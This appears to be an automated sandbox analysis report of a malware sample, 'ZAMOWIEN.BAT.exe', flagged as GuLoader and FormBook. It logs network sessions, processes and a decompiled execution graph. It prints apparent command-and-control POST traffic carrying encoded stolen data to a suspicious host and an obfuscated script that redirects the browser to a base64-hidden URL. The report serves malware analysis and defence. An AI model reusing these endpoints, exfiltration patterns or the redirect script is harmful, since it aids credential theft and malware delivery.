                                                                                Date: Mon, 25 Nov 2024 11:02:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Data Raw: 35 37 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 32 59 6d 52 6d 4c 6d 4e 6e 4d 54 51 7a 62 69 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 3d 27 29 3c 2f 73 63 72 69 0d 0a 33 0d 0a 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 57<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly82YmRmLmNnMTQzbi5wcm86NjY4OQ==')</scri3pt>0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                75192.168.11.204981843.155.76.12480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:33.742006063 CET718OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 54 37 57 2b 33 66 34 2b 78 41 61 58 4c 62 4d 65 55 75 54 67 57 43 6d 56 61 36 5a 42 41 46 4c 71 49 38 79 53 5a 33 35 4a 54 6a 55 52 59 51 47 34 6f 33 56 31 47 6f 50 4f 67 7a 58 61 49 53 49 77 4f 33 41 63 39 53 71 64 36 36 62 57 47 51 43 43 30 36 33 66 2f 76 6f 32 33 41 4f 30 45 66 4a 76 76 44 68 74 79 4f 6d 62 44 5a 37 64 7a 70 75 59 70 2b 45 4e 78 46 41 2b 46 45 6f 2f 77 77 4a 32 50 6b 31 56 37 53 74 35 34 72 2f 33 6a 47 35 44 49 48 74 41 6b 74 32 4c 69 66 38 33 2b 43 4d 36 72 4e 70 5a 66 4f 7a 74 2b 66 50 59 46 6a 47 72 30 62 61 4e 7a 41 3d 3d
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNT7W+3f4+xAaXLbMeUuTgWCmVa6ZBAFLqI8ySZ35JTjURYQG4o3V1GoPOgzXaISIwO3Ac9Sqd66bWGQCC063f/vo23AO0EfJvvDhtyOmbDZ7dzpuYp+ENxFA+FEo/wwJ2Pk1V7St54r/3jG5DIHtAkt2Lif83+CM6rNpZfOzt+fPYFjGr0baNzA==
                                                                                Nov 25, 2024 12:02:34.062474966 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:33 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                76192.168.11.204981943.155.76.12480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:36.583499908 CET738OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 56 6f 65 2b 37 65 34 2b 32 67 61 55 48 37 4d 65 64 4f 53 70 57 43 36 56 61 34 30 4b 41 32 76 71 4a 65 61 53 59 32 35 4a 51 6a 55 52 41 41 47 35 6d 58 56 45 47 70 7a 47 67 7a 62 61 49 57 6f 77 4f 79 38 63 39 68 79 65 67 4b 62 55 4e 77 43 41 70 4b 33 66 2f 76 6f 32 33 41 61 65 45 66 42 76 75 7a 52 74 67 37 53 63 4a 35 37 65 35 4a 75 59 2b 75 45 52 78 46 41 63 46 47 52 51 77 30 35 32 50 6b 46 56 37 44 74 36 7a 72 2f 78 75 6d 34 4f 48 48 42 4b 6b 76 36 76 72 39 34 37 38 68 4d 62 6a 37 6b 44 43 38 48 4a 39 4d 54 71 42 54 2f 44 32 5a 62 57 75 48 55 41 39 65 67 32 76 6b 33 4e 4a 34 58 64 4a 58 51 5a 32 65 55 3d
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNVoe+7e4+2gaUH7MedOSpWC6Va40KA2vqJeaSY25JQjURAAG5mXVEGpzGgzbaIWowOy8c9hyegKbUNwCApK3f/vo23AaeEfBvuzRtg7ScJ57e5JuY+uERxFAcFGRQw052PkFV7Dt6zr/xum4OHHBKkv6vr9478hMbj7kDC8HJ9MTqBT/D2ZbWuHUA9eg2vk3NJ4XdJXQZ2eU=
                                                                                Nov 25, 2024 12:02:36.902487993 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:36 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                77192.168.11.204982043.155.76.12480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:39.428847075 CET6445OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 56 6f 65 2b 37 65 34 2b 32 67 61 55 48 37 4d 65 64 4f 53 70 57 43 36 56 61 34 30 4b 41 32 6e 71 4a 76 36 53 61 56 52 4a 52 6a 55 52 65 51 47 38 6d 58 56 5a 47 70 72 43 67 79 6e 6b 49 55 51 77 63 41 45 63 37 55 47 65 31 61 62 55 43 51 43 42 30 36 33 77 2f 76 59 79 33 41 4b 65 45 66 42 76 75 31 39 74 69 75 6d 63 50 35 37 64 7a 70 75 55 70 2b 45 74 78 46 59 6d 46 47 56 36 77 6e 78 32 4f 41 68 56 34 77 46 36 76 37 2f 7a 72 6d 35 64 48 48 4d 51 6b 73 4f 6a 72 39 38 43 38 69 73 62 68 2f 4e 45 56 63 33 6c 6a 64 76 35 45 51 50 30 32 76 79 47 6c 46 59 2b 32 4e 49 41 73 54 44 46 48 72 62 54 4e 56 64 53 73 59 72 79 4c 4c 73 43 61 38 73 56 46 56 5a 74 2b 69 67 30 4c 77 47 30 56 72 62 32 58 75 44 69 46 48 53 32 2f 36 54 6f 76 6d 52 55 66 6b 2f 55 4a 6c 76 7a 68 31 37 77 45 34 33 68 68 36 52 37 42 36 42 32 71 70 69 35 31 64 46 56 4e 49 35 49 56 56 5a 6a 59 4b 6b 68 67 69 51 50 49 53 33 2b 67 61 53 5a 36 7a 38 71 38 54 75 2f 32 53 78 35 61 44 69 5a 76 4e 70 53 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNVoe+7e4+2gaUH7MedOSpWC6Va40KA2nqJv6SaVRJRjUReQG8mXVZGprCgynkIUQwcAEc7UGe1abUCQCB063w/vYy3AKeEfBvu19tiumcP57dzpuUp+EtxFYmFGV6wnx2OAhV4wF6v7/zrm5dHHMQksOjr98C8isbh/NEVc3ljdv5EQP02vyGlFY+2NIAsTDFHrbTNVdSsYryLLsCa8sVFVZt+ig0LwG0Vrb2XuDiFHS2/6TovmRUfk/UJlvzh17wE43hh6R7B6B2qpi51dFVNI5IVVZjYKkhgiQPIS3+gaSZ6z8q8Tu/2Sx5aDiZvNpSCZ5D90qMBpRermazRKYd0B+T7amTaBJvYINJtfMu+0bc+Wd80cfv6cijkQZQvhEzidAPOwn1L0E+bXR+7CSOWAsHJOAg0X5YzGvsWT/x5kerF7+k0tfOQNUZISXzzVUBzBvuNNBvUSJmoHBZb7XLfLDmKMHlBs0QySJx1Dz1fJgqhERmAvo2h7GZDcaaZPyTgNT99iIW7/IlMsA3FcSZupLV1WU5fX/nnfK7EmvgdqhIUbGc99Br+KGGrDMRgMblHzQ2GSGirWpjzrHkBl1JvCJmNTY6GNseW907ps+wzBCwRVZ/wdzCkzkLfhhDR1+KKtrS1cgMXm4JjLYSsrKZ4p0eALZityWAFx6kgsdLSCMGEVyy6ctxON1EKsTqN7Jl5KYx5kiDRLbdN4qKoZyRdkR9/A41/4VhXA/I5zdUTtWIUUoqBeVZy//SKbh255q8yh+CY+it8EzstZbGdSvzibq3xncnIav6s3px1/NDeKPP2QyQuy/r5ZMO2FON9wxJUu47MEl+pe1v3toYk14bMkYhtCKMQvSMXK6O8hDMGmurUEASI+uD6XN2L58qzG6U2kG+w9Qw1mH+PihCmhYlkElT0ivFyMyYM/qTD6rAybhRNaP9d9duzEX+XRy5uAm2FuBqgqa8VgsoIpXj3L792hd578TokibVFL [TRUNCATED]
                                                                                Nov 25, 2024 12:02:39.428934097 CET1442OUTData Raw: 64 78 4e 58 77 63 69 57 79 56 59 76 38 72 30 45 54 51 72 56 68 5a 43 2f 6a 62 38 6d 2b 5a 75 41 74 53 6f 43 32 68 6b 30 59 37 7a 44 73 53 39 6a 37 2b 39 67 47 62 2f 63 73 4e 47 49 31 68 65 74 50 53 77 34 4e 61 37 2b 66 74 74 35 38 49 6d 42 58 30
                                                                                Data Ascii: dxNXwciWyVYv8r0ETQrVhZC/jb8m+ZuAtSoC2hk0Y7zDsS9j7+9gGb/csNGI1hetPSw4Na7+ftt58ImBX0yqoEMFcLQQB5OKm/w3Ly+wsm97i+bJxDl2CydyDCuTORBgFYtCLXIWn0q4blm8GPjgMvk4X2Ak3NXN2gSXW4fWvFx9OsMym1ff8HyaYwPkd/EQM1blx34honq05ip72lwbsGZnr+snPLhEngqA0prSVNJFLktfF0a
                                                                                Nov 25, 2024 12:02:39.750567913 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:39 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                78192.168.11.204982143.155.76.12480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:02:42.273834944 CET454OUTGET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:02:42.597754002 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 11:02:42 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:05:54:51
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                                Imagebase:0x400000
                                                                                File size:974'630 bytes
                                                                                MD5 hash:936FD06CF63ED725BDB6BC4C83BED228
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:05:56:46
                                                                                Start date:25/11/2024
                                                                                Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                                Imagebase:0x400000
                                                                                File size:974'630 bytes
                                                                                MD5 hash:936FD06CF63ED725BDB6BC4C83BED228
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.33603243074.0000000037400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:05:57:04
                                                                                Start date:25/11/2024
                                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                Imagebase:0x140000000
                                                                                File size:16'696'840 bytes
                                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:05:57:06
                                                                                Start date:25/11/2024
                                                                                Path:C:\Windows\SysWOW64\sdchange.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                                Imagebase:0xd0000
                                                                                File size:40'960 bytes
                                                                                MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.36984586192.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.36984512971.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:5
                                                                                Start time:05:57:31
                                                                                Start date:25/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff629a20000
                                                                                File size:597'432 bytes
                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:18.5%
                                                                                  Dynamic/Decrypted Code Coverage:13.5%
                                                                                  Signature Coverage:20.1%
                                                                                  Total number of Nodes:1567
                                                                                  Total number of Limit Nodes:35
                                                                                  execution_graph 4148 401941 4149 401943 4148->4149 4154 402c41 4149->4154 4155 402c4d 4154->4155 4200 4062a6 4155->4200 4158 401948 4160 405996 4158->4160 4242 405c61 4160->4242 4163 4059d5 4167 405b00 4163->4167 4256 406284 lstrcpynW 4163->4256 4164 4059be DeleteFileW 4170 401951 4164->4170 4166 4059fb 4168 405a01 lstrcatW 4166->4168 4169 405a0e 4166->4169 4167->4170 4285 4065c7 FindFirstFileW 4167->4285 4171 405a14 4168->4171 4257 405ba5 lstrlenW 4169->4257 4174 405a24 lstrcatW 4171->4174 4175 405a1a 4171->4175 4177 405a2f lstrlenW FindFirstFileW 4174->4177 4175->4174 4175->4177 4179 405af5 4177->4179 4198 405a51 4177->4198 4178 405b1e 4288 405b59 lstrlenW CharPrevW 4178->4288 4179->4167 4182 40594e 5 API calls 4185 405b30 4182->4185 4184 405ad8 FindNextFileW 4186 405aee FindClose 4184->4186 4184->4198 4187 405b34 4185->4187 4188 405b4a 4185->4188 4186->4179 4187->4170 4191 4052ec 24 API calls 4187->4191 4190 4052ec 24 API calls 4188->4190 4190->4170 4193 405b41 4191->4193 4192 405996 60 API calls 4192->4198 4195 40604a 36 API calls 4193->4195 4194 4052ec 24 API calls 4194->4184 4196 405b48 4195->4196 4196->4170 4198->4184 4198->4192 4198->4194 4261 406284 lstrcpynW 4198->4261 4262 40594e 4198->4262 4270 4052ec 4198->4270 4281 40604a MoveFileExW 4198->4281 4215 4062b3 4200->4215 4201 4064fe 4202 402c6e 4201->4202 4233 406284 lstrcpynW 4201->4233 4202->4158 4217 406518 4202->4217 4204 4064cc lstrlenW 4204->4215 4207 4062a6 10 API calls 4207->4204 4209 4063e1 GetSystemDirectoryW 4209->4215 4210 4063f4 GetWindowsDirectoryW 4210->4215 4211 406518 5 API calls 4211->4215 4212 406428 SHGetSpecialFolderLocation 4212->4215 4216 406440 SHGetPathFromIDListW CoTaskMemFree 4212->4216 4213 4062a6 10 API calls 4213->4215 4214 40646f lstrcatW 4214->4215 4215->4201 4215->4204 4215->4207 4215->4209 4215->4210 4215->4211 4215->4212 4215->4213 4215->4214 4226 406152 4215->4226 4231 4061cb wsprintfW 4215->4231 4232 406284 lstrcpynW 4215->4232 4216->4215 4223 406525 4217->4223 4218 4065a0 CharPrevW 4221 40659b 4218->4221 4219 40658e CharNextW 4219->4221 4219->4223 4221->4218 4222 4065c1 4221->4222 4222->4158 4223->4219 4223->4221 4224 40657a CharNextW 4223->4224 4225 406589 CharNextW 4223->4225 4238 405b86 4223->4238 4224->4223 4225->4219 4234 4060f1 4226->4234 4229 4061b6 4229->4215 4230 406186 RegQueryValueExW RegCloseKey 4230->4229 4231->4215 4232->4215 4233->4202 4235 406100 4234->4235 4236 406104 4235->4236 4237 406109 RegOpenKeyExW 4235->4237 4236->4229 4236->4230 4237->4236 4239 405b8c 4238->4239 4240 405ba2 4239->4240 4241 405b93 CharNextW 4239->4241 4240->4223 4241->4239 4291 406284 lstrcpynW 4242->4291 4244 405c72 4292 405c04 CharNextW CharNextW 4244->4292 4247 4059b6 4247->4163 4247->4164 4248 406518 5 API calls 4254 405c88 4248->4254 4249 405cb9 lstrlenW 4250 405cc4 4249->4250 4249->4254 4251 405b59 3 API calls 4250->4251 4253 405cc9 GetFileAttributesW 4251->4253 4252 4065c7 2 API calls 4252->4254 4253->4247 4254->4247 4254->4249 4254->4252 4255 405ba5 2 API calls 4254->4255 4255->4249 4256->4166 4258 405bb3 4257->4258 4259 405bc5 4258->4259 4260 405bb9 CharPrevW 4258->4260 4259->4171 4260->4258 4260->4259 4261->4198 4298 405d55 GetFileAttributesW 4262->4298 4265 405971 DeleteFileW 4267 405977 4265->4267 4266 405969 RemoveDirectoryW 4266->4267 4268 40597b 4267->4268 4269 405987 SetFileAttributesW 4267->4269 4268->4198 4269->4268 4271 405307 4270->4271 4272 4053a9 4270->4272 4273 405323 lstrlenW 4271->4273 4274 4062a6 17 API calls 4271->4274 4272->4198 4275 405331 lstrlenW 4273->4275 4276 40534c 4273->4276 4274->4273 4275->4272 4277 405343 lstrcatW 4275->4277 4278 405352 SetWindowTextW 4276->4278 4279 40535f 4276->4279 4277->4276 4278->4279 4279->4272 4280 405365 SendMessageW SendMessageW SendMessageW 4279->4280 4280->4272 4282 40605e 4281->4282 4284 40606b 4281->4284 4301 405ed0 4282->4301 4284->4198 4286 405b1a 4285->4286 4287 4065dd FindClose 4285->4287 4286->4170 4286->4178 4287->4286 4289 405b24 4288->4289 4290 405b75 lstrcatW 4288->4290 4289->4182 4290->4289 4291->4244 4293 405c21 4292->4293 4296 405c33 4292->4296 4295 405c2e CharNextW 4293->4295 4293->4296 4294 405c57 4294->4247 4294->4248 4295->4294 4296->4294 4297 405b86 CharNextW 4296->4297 4297->4296 4299 40595a 4298->4299 4300 405d67 SetFileAttributesW 4298->4300 4299->4265 4299->4266 4299->4268 4300->4299 4302 405f00 4301->4302 4303 405f26 GetShortPathNameW 4301->4303 4328 405d7a GetFileAttributesW CreateFileW 4302->4328 4304 406045 4303->4304 4305 405f3b 4303->4305 4304->4284 4305->4304 4308 405f43 wsprintfA 4305->4308 4307 405f0a CloseHandle GetShortPathNameW 4307->4304 4309 405f1e 4307->4309 4310 4062a6 17 API calls 4308->4310 4309->4303 4309->4304 4311 405f6b 4310->4311 4329 405d7a GetFileAttributesW CreateFileW 4311->4329 4313 405f78 4313->4304 4314 405f87 GetFileSize GlobalAlloc 4313->4314 4315 405fa9 4314->4315 4316 40603e CloseHandle 4314->4316 4330 405dfd ReadFile 4315->4330 4316->4304 4321 405fc8 lstrcpyA 4324 405fea 4321->4324 4322 405fdc 4323 405cdf 4 API calls 4322->4323 4323->4324 4325 406021 SetFilePointer 4324->4325 4337 405e2c WriteFile 4325->4337 4328->4307 4329->4313 4331 405e1b 4330->4331 4331->4316 4332 405cdf lstrlenA 4331->4332 4333 405d20 lstrlenA 4332->4333 4334 405d28 4333->4334 4335 405cf9 lstrcmpiA 4333->4335 4334->4321 4334->4322 4335->4334 4336 405d17 CharNextA 4335->4336 4336->4333 4338 405e4a GlobalFree 4337->4338 4338->4316 4339 4015c1 4340 402c41 17 API calls 4339->4340 4341 4015c8 4340->4341 4342 405c04 4 API calls 4341->4342 4347 4015d1 4342->4347 4343 401631 4344 401663 4343->4344 4345 401636 4343->4345 4350 401423 24 API calls 4344->4350 4366 401423 4345->4366 4346 405b86 CharNextW 4346->4347 4347->4343 4347->4346 4356 401617 GetFileAttributesW 4347->4356 4358 405855 4347->4358 4361 4057bb CreateDirectoryW 4347->4361 4370 405838 CreateDirectoryW 4347->4370 4351 40165b 4350->4351 4355 40164a SetCurrentDirectoryW 4355->4351 4356->4347 4373 40665e GetModuleHandleA 4358->4373 4362 40580c GetLastError 4361->4362 4363 405808 4361->4363 4362->4363 4364 40581b SetFileSecurityW 4362->4364 4363->4347 4364->4363 4365 405831 GetLastError 4364->4365 4365->4363 4367 4052ec 24 API calls 4366->4367 4368 401431 4367->4368 4369 406284 lstrcpynW 4368->4369 4369->4355 4371 405848 4370->4371 4372 40584c GetLastError 4370->4372 4371->4347 4372->4371 4374 406684 GetProcAddress 4373->4374 4375 40667a 4373->4375 4378 40585c 4374->4378 4379 4065ee GetSystemDirectoryW 4375->4379 4377 406680 4377->4374 4377->4378 4378->4347 4380 406610 wsprintfW LoadLibraryExW 4379->4380 4380->4377 5177 404a42 5178 404a52 5177->5178 5179 404a6e 5177->5179 5188 4058ce GetDlgItemTextW 5178->5188 5181 404aa1 5179->5181 5182 404a74 SHGetPathFromIDListW 5179->5182 5184 404a8b SendMessageW 5182->5184 5185 404a84 5182->5185 5183 404a5f SendMessageW 5183->5179 5184->5181 5187 40140b 2 API calls 5185->5187 5187->5184 5188->5183 5203 70501058 5204 70501074 5203->5204 5205 705010dd 5204->5205 5207 70501092 5204->5207 5216 70501516 5204->5216 5208 70501516 GlobalFree 5207->5208 5209 705010a2 5208->5209 5210 705010b2 5209->5210 5211 705010a9 GlobalSize 5209->5211 5212 705010b6 GlobalAlloc 5210->5212 5213 705010c7 5210->5213 5211->5210 5214 7050153d 3 API calls 5212->5214 5215 705010d2 GlobalFree 5213->5215 5214->5213 5215->5205 5218 7050151c 5216->5218 5217 70501522 5217->5207 5218->5217 5219 7050152e GlobalFree 5218->5219 5219->5207 5220 705016d8 5221 70501707 5220->5221 5222 70501b63 22 API calls 5221->5222 5223 7050170e 5222->5223 5224 70501721 5223->5224 5225 70501715 5223->5225 5227 70501748 5224->5227 5228 7050172b 5224->5228 5226 70501272 2 API calls 5225->5226 5232 7050171f 5226->5232 5230 70501772 5227->5230 5231 7050174e 5227->5231 5229 7050153d 3 API calls 5228->5229 5233 70501730 5229->5233 5235 7050153d 3 API calls 5230->5235 5234 705015b4 3 API calls 5231->5234 5236 705015b4 3 API calls 5233->5236 5237 70501753 5234->5237 5235->5232 5238 70501736 5236->5238 5239 70501272 2 API calls 5237->5239 5240 70501272 2 API calls 5238->5240 5241 70501759 GlobalFree 5239->5241 5242 7050173c GlobalFree 5240->5242 5241->5232 5243 7050176d GlobalFree 5241->5243 5242->5232 5243->5232 4569 401e49 4570 402c1f 17 API calls 4569->4570 4571 401e4f 4570->4571 4572 402c1f 17 API calls 4571->4572 4573 401e5b 4572->4573 4574 401e72 EnableWindow 4573->4574 4575 401e67 ShowWindow 4573->4575 4576 402ac5 4574->4576 4575->4576 4577 40264a 4578 402c1f 17 API calls 4577->4578 4587 402659 4578->4587 4579 402796 4580 4026a3 ReadFile 4580->4579 